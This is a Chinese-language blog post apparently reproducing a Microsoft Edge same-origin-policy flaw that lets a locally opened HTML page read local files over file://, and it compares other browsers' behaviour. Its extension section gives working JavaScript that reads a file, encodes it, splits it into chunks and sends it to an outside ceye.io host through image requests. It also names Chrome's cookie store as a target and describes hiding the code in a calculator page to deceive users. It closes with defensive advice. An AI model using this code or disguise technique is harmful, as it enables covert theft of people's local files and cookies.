Microsoft Edge同源策略不严导致任意文件读取测试

edge.png

漏洞介绍

近期看到文章介绍,称Microsoft Edge对SOP同源策略处理存在问题,可导致任意文件泄露。
SOP同源策略是比较常见的,简单来说,在访问A域名时,如果B域名站点存在JS动作通过XHR请求了A域名网站下资源,该动作会被同源策略拒绝,因为它们非同源。
同源的判定标准是一个三元组,任意一个不同则判定不同源:协议、主机名、端口号

在浏览器中,可以使用file://协议来读取文件,攻击者如果想要读取到访问者的本地文件,由于http和file协议不同,不同源的情况下并不能做到。
但是这个限制在特定场景下就不存在了,如果恶意页面是保存在本地的文件,通过浏览器打开html文件,URL中协议就是file://,此时如果页面中存在XHR请求file://协议,该请求是符合同源要求的,可能导致本地文件读取。

复现测试

0x01 准备工作

尝试读取的本地文件:

txt.png

poc代码:

    
     
    
        
0x02 非Microsoft Edge浏览器测试

Chrome浏览器:提示同源策略请求只支持http,data,chrome,chrome-extension,https协议


chrome.png

fireforx浏览器:提示同源策略进制读取,CORS只能是http协议


firefox.png

ie11浏览器:提示拒绝访问


ie.png
0x03 Microsoft Edge浏览器测试

看到的文章中测试版本是Microsoft Edge 40.15063.0.0,这里测试使用的是比它更新的版本:

version.png

测试结果是:没有触发错误拦截信息,能够直接获取到本地文件内容:

edge1.png

相关拓展

0x01 任意数据外带

在测试中是仅仅对一个txt文件内容进行了读取,并将内容展示在页面中。

还可以读取其他浏览器存储的一些cookie信息,如:
Chrome的cookie信息一般在

C:/Users/${user}/AppData/Local/Google/Chrome/User Data/Default/Cookies
cookie.png

攻击者如果想要通过恶意页面,将本地的数据带出,也是轻而易举的。比如,可以在js中创建img标签,发起http请求攻击者的服务器,并且携带读取到的文件内容。

如果文件内容过长,get请求的URL会超长,还能对文件内容进行分割、间隔多次传输;
如果文件内容不仅是文本文字,或是图片等,还能通过各种编码进行包装传输(如encodeURI):

let resultDiv = document.getElementById("result");
    let data = "";    
    let xhr= new XMLHttpRequest();    
    let limit = 1024
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= function () {    
        if(xhr.readyState==4) {    
            resultDiv.innerText = xhr.responseText;
            url =  "http://XXXXX.ceye.io/data/?data=";   
            // data = window.btoa(xhr.responseText);  
            data = encodeURI(xhr.responseText);  
            console.log(data.length)
            let st=setInterval(function(){
                img = document.createElement("img");
                if (data.length <= limit) {
                    if (data.length == 0) {
                        clearInterval(st)
                    }else {
                        img.src = url + data;
                        resultDiv.appendChild(img);
                        clearInterval(st)
                        console.log("A:"+data.length)
                    }
                } else {
                    temp = data.substr(0, limit);
                    data = data.substr(limit,data.length-1);
                    img.src = url + temp;
                    resultDiv.appendChild(img);
                    console.log("B:"+temp.length)
                } 
            },1000)
        }    
    }    
    xhr.send();
image.png

攻击者接收的数据段之一:

image1.png
0x02 隐藏伪装

造成任意文件内容泄露的JS代码本体并不大,可以隐藏在其他正常的下载页面中,在用户疏于防范的情况下隐蔽地执行;
结合社会工程等手段,可以更轻易地进行攻击利用。
例如,当下载一个用于学习html的网页,作者建议使用Microsoft Edge进行打开,你很可能会听从作者建议就运行查看效果

dir.png
calc.png

当页面功能显示正常,是一个计算器的网页,警惕心就没有了。
当你可能还沉浸在玩耍它的计算功能和学习源码的过程中时,攻击者想要的你本地文件内容可能已经被偷偷传走了

res.png

防护建议

1、不要随意打开不能确定是否存在危害的文件,包括html文件(先看一遍源代码)
2、使用解决了该问题的更新版本的Microsoft Edge
3、使用Chrome或者Firefox等浏览器

你可能感兴趣的:(Microsoft Edge同源策略不严导致任意文件读取测试)